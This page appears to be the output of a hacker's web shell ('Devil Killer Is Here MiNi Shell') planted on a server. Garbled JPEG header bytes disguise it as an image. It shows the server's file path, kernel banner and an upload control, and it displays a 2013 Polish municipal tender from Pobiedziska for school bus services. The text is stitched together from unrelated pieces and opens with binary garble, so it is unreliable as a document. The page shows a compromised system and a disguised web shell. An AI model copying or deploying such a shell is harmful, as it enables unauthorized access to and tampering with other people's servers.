JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130730/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130730/303562-N-2013.html

<p class="kh_header"><b>Pobiedziska: Dowozy dzieci do szkół w roku szkolnych 2013 - 2014</b><br>
<b>Numer ogłoszenia: 303562 - 2013; data zamieszczenia: 30.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pobiedziska , ul. Tadeusza Kościuszki 4, 62-010 Pobiedziska, woj. wielkopolskie, tel. 061 8977100, faks 061 8977124.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pobiedziska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowozy dzieci do szkół w roku szkolnych 2013 - 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest świadczenie usług w zakresie przewozu dzieci szkolnych do szkół na terenie Miasta i Gminy Pobiedziska w roku szkolnym 2013/2014.
2.	Zakres przedmiotu zamówienia.
2.1. Zadanie 1. 
Dowóz dzieci do Zespołu Szkół, Szkoła Podstawowa i Gimnazjum w Pobiedziskach - autobus nr 1 
a)	Przejazdy dzieci i młodzieży szkolnej należy zapewnić w dniu nauki szkolnej przewidziane organizacją roku szkolnego 2013/2014, począwszy od 02 września 2013 r. do 27 czerwca 2014 r.
b)	Liczba miejsc w autobusie - 50.
c)	Dowóz dzieci do placówek szkolnych musi być zapewniony najpóźniej na godz. 8.30. Dowóz dzieci rozpocząć należy nie wcześniej niż o godz. 7:10, zgodnie z rozkładem jazdy.
d)	Odwóz dzieci po zakończeniu zajęć szkolnych od ok. godz. 14.10 do godz. 16.45, zgodnie z rozkładem jazdy.
e)	Godziny wymienione w pkt. c) i d) mogą ulec zmianie. Wykonawca będzie informowany o planowanych zmianach co najmniej 7 dni przed ich wprowadzeniem. 
f)	Zamawiający zastrzega sobie prawo do zmiany liczby kilometrów na poszczególnych trasach w trakcie realizacji zamówienia. Szczegółowy zakres dowozu lub ewentualne zmiany w ilości kilometrów czy godzinach dowozu, zostaną ustalone na podstawie  aneksu do podpisanej umowy po rozpoczęciu roku szkolnego. 
g)	Zamawiający zastrzega sobie prawo do zmiany przebiegu trasy oraz zmiany przystanków w trakcie realizacji zamówienia. Szczegółowy zakres dowozu lub ewentualne zmiany tras lub przystanków, zostaną ustalone na podstawie aneksu do podpisanej umowy po rozpoczęciu roku szkolnego.
h)	Wymaga się aby wszystkim przewożonym uczniom oraz opiekunowi zapewniono w autobusach miejsca siedzące.
i)	Pojazdy służące do przewozu osób muszą być w pełni sprawne, spełniać wymogi bezpieczeństwa (zgodnie z obowiązującymi przepisami prawa), posiadać aktualne badania techniczne i aktualną polisę ubezpieczeniową. 
j)	Pojazdy służące do przewozów dzieci muszą być utrzymane w czystości.
k)	Opiekuna dzieci zapewnia Zamawiający.
2.2. Zadanie 2.
Dowóz dzieci do Zespołu Szkół, Szkoła Podstawowa i Gimnazjum w Pobiedziskach oraz 
Szkoły Podstawowej w Węglewie - autobus nr 2 
a)	Przejazdy dzieci i młodzieży szkolnej należy zapewnić w dniu nauki szkolnej przewidziane organizacją roku szkolnego 2013/2014, począwszy od 02 września 2013 r. do 27 czerwca 2014 r. według rozkładu przedstawionego poniżej.
b)	Liczba miejsc w autobusie - 60.
c)	Dowóz dzieci do placówek szkolnych musi być zapewniony najpóźniej na godz. 8.30. Dowóz dzieci rozpocząć należy nie wcześniej niż o godz. 7:10, zgodnie z rozkładem jazdy.
d)	Odwóz dzieci po zakończeniu zajęć szkolnych od ok. godz. 14.10 do godz. 16.10, zgodnie z rozkładem jazdy.
e)	Godziny wymienione w pkt. c) i d) mogą ulec zmianie. Wykonawca będzie informowany o planowanych zmianach co najmniej 7 dni przed ich wprowadzeniem. 
f)	Zamawiający zastrzega sobie prawo do zmiany liczby kilometrów na poszczególnych trasach w trakcie realizacji zamówienia. Szczegółowy zakres dowozu lub ewentualne zmiany w ilości kilometrów czy godzinach dowozu, zostaną ustalone na podstawie  aneksu do podpisanej umowy po rozpoczęciu roku szkolnego. 
g)	Zamawiający zastrzega sobie prawo do zmiany przebiegu trasy oraz zmiany przystanków w trakcie realizacji zamówienia. Szczegółowy zakres dowozu lub ewentualne zmiany tras lub przystanków, zostaną ustalone na podstawie aneksu do podpisanej umowy po rozpoczęciu roku szkolnego.
h)	Wymaga się aby wszystkim przewożonym uczniom zapewniono w autobusach miejsca siedzące.
i)	Pojazdy służące do przewozu osób muszą być w pełni sprawne, spełniać wymogi bezpieczeństwa (zgodnie z obowiązującymi przepisami prawa), posiadać aktualne badania techniczne i aktualną polisę ubezpieczeniową. 
j)	Pojazdy służące do przewozów dzieci muszą być utrzymane w czystości.
k)	Opiekuna dzieci zapewnia zamawiający.
2.3 Zadanie 3.
Dowóz dzieci do Zespołu Szkół, Szkoła Podstawowa i Gimnazjum we Wronczynie oraz do Zespołu Szkół, Szkoła Podstawowa i Gimnazjum w Pobiedziskach - autobus nr 3
a)	Przejazdy dzieci i młodzieży szkolnej należy zapewnić w dniu nauki szkolnej przewidziane organizacją roku szkolnego 2013/2014, począwszy od 02 września 2013 r. do 27 czerwca 2014 r. według rozkładu przedstawionego poniżej.
b)	Liczba miejsc w autobusie - 50.
c)	Dowóz dzieci do placówek szkolnych musi być zapewniony najpóźniej na godz. 8.30. Dowóz dzieci rozpocząć należy nie wcześniej niż o godz. 6:30, zgodnie z rozkładem jazdy.
d)	Odwóz dzieci po zakończeniu zajęć szkolnych od ok. godz. 13.30 do godz. 16.00, zgodnie z rozkładem jazdy.
e)	Godziny wymienione w pkt. c) i d) mogą ulec zmianie. Wykonawca będzie informowany 
o planowanych zmianach co najmniej 7 dni przed ich wprowadzeniem. 
f)	Zamawiający zastrzega sobie prawo do zmiany liczby kilometrów na poszczególnych trasach 
w trakcie realizacji zamówienia. Szczegółowy zakres dowozu lub ewentualne zmiany w ilości kilometrów czy godzinach dowozu, zostaną ustalone na podstawie  aneksu do podpisanej umowy po rozpoczęciu roku szkolnego. 
g)	Zamawiający zastrzega sobie prawo do zmiany przebiegu trasy oraz zmiany przystanków w trakcie realizacji zamówienia. Szczegółowy zakres dowozu lub ewentualne zmiany tras lub przystanków, zostaną ustalone na podstawie aneksu do podpisanej umowy po rozpoczęciu roku szkolnego.
h)	Wymaga się aby wszystkim przewożonym uczniom oraz opiekunowi zapewniono w autobusach miejsca siedzące.
i)	Pojazdy służące do przewozu osób muszą być w pełni sprawne, spełniać wymogi bezpieczeństwa (zgodnie z obowiązującymi przepisami prawa), posiadać aktualne badania techniczne i aktualną polisę ubezpieczeniową. 
j)	Pojazdy służące do przewozów dzieci muszą być utrzymane w czystości.
k)	Opiekuna dzieci zapewnia Zamawiający. 

Rozkłady jazdy znajdują się w SIWZ.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1.	Zamawiający przewiduje udzielenia zamówień uzupełniających do 50%.
2.	Zamówienia uzupełniające polegać będą na powtórzeniu usługi opisanej w zamówieniu podstawowym, tj. w zakresie przewozu dzieci do szkół na terenie Miasta i Gminy Pobiedziska w roku szkolnym 2013/2014.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.17.20.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. posiadania koncesji lub licencji w zakresie wykonywania krajowego transportu drogowego osób</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania w dyspozycji minimum jednego autobusu, który umożliwia transport 50 osób (dotyczy zadania 1 i 3) oraz 60 osób (dotyczy zadania 2)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. posiadania w dyspozycji co najmniej jednego kierowcę przypadającego na jeden autobus, który posiada wymagane kwalifikacje do prowadzenia pojazdów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tj. posiadanie polisy ubezpieczeniowej od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 20.000,00 zł (dotyczy złożenia oferty na jedno lub dwa zadania).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące możliwości i warunki dokonania zmian w umowie: 
a)	zmiana strony umowy tj. następstwo prawne wynikające z odrębnych przepisów oraz zmiana nazwy, adresu i siedziby jednej ze stron, 
b)	zmiana obowiązujących przepisów prawa pociągająca za sobą zmianę postanowień  umowy,
c)	zmiana wartości umowy ze względu na ustawową zmianę stawki podatku VAT,
d)	nieprzewidzianych okoliczności formalno-prawnych,
e)	danych osobowych: przedstawicieli i osób upoważnionych (tylko w uzgodnieniu i po otrzymaniu akceptacji Zamawiającego) podwykonawcy lub innego podmiotu uczestniczącego w realizacji przedmiotu zamówienia, na którego zasobach polegać będzie Wykonawca - wyłącznie na pisemny wniosek Wykonawcy i za zgodą Zamawiającego, udzieloną wyłącznie po dostarczeniu dokumentów określonych przez Zamawiającego, adekwatnie do wymagań obowiązujących w trakcie przeprowadzonej procedury przetargowej, 
f)	zmiana liczby kilometrów na poszczególnych trasach w trakcie realizacji zamówienia. Szczegółowy zakres dowozu lub ewentualne zmiany w ilości kilometrów czy godzinach dowozu, zostaną ustalone na podstawie aneksu do podpisanej umowy po rozpoczęciu roku szkolnego. 
g)	zmiana przebiegu trasy oraz zmiana przystanków w trakcie realizacji zamówienia. Szczegółowy zakres dowozu lub ewentualne zmiany tras lub przystanków, zostaną ustalone na podstawie aneksu do podpisanej umowy po rozpoczęciu roku szkolnego.
h)	Zmiana terminu realizacji może nastąpić jedynie w przypadku zmiany obowiązywania roku szkolnego 2013 - 2014,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pobiedziska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Pobiedziska
ul. Kościuszki 4
62-010 Pobiedziska
pokój 311.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2013 godzina 11:00, miejsce: Gmina Pobiedziska
ul. Kościuszki 4
62-010 Pobiedziska
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowóz dzieci do Zespołu Szkół, Szkoła Podstawowa i Gimnazjum w Pobiedziskach - autobus nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba miejsc w autobusie: min. 50
Liczba km dziennie: 131
Łączna liczba km: 24.497.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.17.20.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowóz dzieci do Zespołu Szkół, Szkoła Podstawowa i Gimnazjum w Pobiedziskach oraz 
Szkoły Podstawowej w Węglewie - autobus nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba miejsc w autobusie: 60
Liczba kilometrów dzienni: 98
Łączna liczba km: 18.326.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.17.20.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dowóz dzieci do Zespołu Szkół, Szkoła Podstawowa i Gimnazjum we Wronczynie oraz do Zespołu Szkół, Szkoła Podstawowa i Gimnazjum w Pobiedziskach - autobus nr 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba miejsc w autobusie: 50
Liczba kilometrów dziennie: 138
Łączna liczba km: 25806.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6, 60.17.20.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com